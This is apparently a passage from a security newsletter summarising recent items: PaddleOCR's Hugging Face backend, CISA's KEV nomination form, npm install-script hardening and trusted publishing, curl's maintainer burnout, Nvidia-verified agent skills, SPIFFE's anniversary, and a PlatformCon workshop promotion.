PaddleOCR 3.5 introduces a flexible inference-engine interface that integrates its OCR and document parsing capabilities (such as PP-OCRv5 and PaddleOCR-VL 1.5) directly into the Hugging Face ecosystem. By setting engine="transformers", you can now leverage Hugging Face Transformers as an inference backend with customisable backend options via the engine_config, ultimately reducing the integration friction for teams already using PyTorch-centered environments.

CISA enhances KEV Catalog to include new nomination form
Source: Cybersecurity and Infrastructure Security Agency

CISA has launched a new online nomination form allowing researchers, vendors, and industry partners to nominate actively exploited vulnerabilities for the Known Exploited Vulnerabilities (KEV) catalog. Aligned with its existing disclosure programmes, the initiative aims to speed up the detection, validation, and sharing of exploitation intelligence to protect federal, private, and critical infrastructure networks. Email submissions continue to be accepted alongside the form.

3 actionable security upgrades to fix npm's trust problem
Source: Nigel Douglas (me)

Securing the Node.js ecosystem requires moving away from historically permissive, trust-by-default toolchains toward an engineered fail-secure model. To blunt the kinds of attacks covered above (malware injected through install scripts, compromised updates), the post walks through three native npm CLI configurations developers can adopt today. The npm registry itself is moving in the same direction by introducing trusted publishing.

npm registry sets stage for more secure package publishing
Source: The Register

Trusted publishing in npm lets developers publish packages directly from CI/CD workflows (such as GitHub Actions, GitLab CI/CD, and CircleCI) using the provider's existing OIDC identity. npm verifies a short-lived OIDC token against a trust relationship configured per package, which removes the need for long-lived npm write tokens in CI entirely. Built on the Trusted Publishers model backed by the OpenSSF, it also generates provenance attestations automatically for public packages, so consumers can verify where and how a package was built, significantly reducing what a stolen credential can achieve.

The curl project outlines some of the pains of open source today
Source: Daniel Stenberg

Daniel Stenberg, the founder and lead developer of curl, reflects on his nearly 30-year journey of running the widely used open-source project as a grueling, 50+ hour-a-week labour of love. However, the project is currently facing an unprecedented crisis: a massive influx of high-quality, complex security reports has doubled since 2025, taking a heavy mental toll and threatening Stenberg with burnout. Despite the intense pressure and a record number of impending vulnerabilities, Stenberg emphasises that curl remains a highly scrutinised and iteratively improved project with mostly low-to-medium severity bugs.


Nvidia-verified agent skills
Source: Nvidia developer blog

Skills make your agent more capable, but can also introduce vulnerabilities. Nvidia’s verified skills give you transparency into what a skill does, where it came from, what risks it carries, and whether it's been modified. Every verified skill carries a skill card and is built on the agentskills.io open specification to work reliably across Claude Code, OpenAI Codex, and Cursor.

10 Years of SPIFFE
Source: joe.dev

Celebrating the 10th anniversary of SPIFFE (the now open-source standard for securing workload communication without passwords) creator Joe Beda reflects on how the concept of cryptographic identity is finally having its moment, driven by the modern rise of AI agents. To mark the milestone, Beda shared the original design documents and presentation slides, while also highlighting a fun design easter egg: the logo's signature colours were originally chosen because they match his last name in hex code (#00BEDA and #BEDA00).

PlatformCon 2026 - Don't miss out!
Source: Cloudsmith

Whether or not you can make it to London or New York for the PlatformCon Live Days, I’ll also be delivering a series of virtual workshops during PlatformCon week. Join me to dive into AI security, malicious packages, policy-as-code, and more. If that sounds exciting, be sure to sign up for free today to reserve your spot!
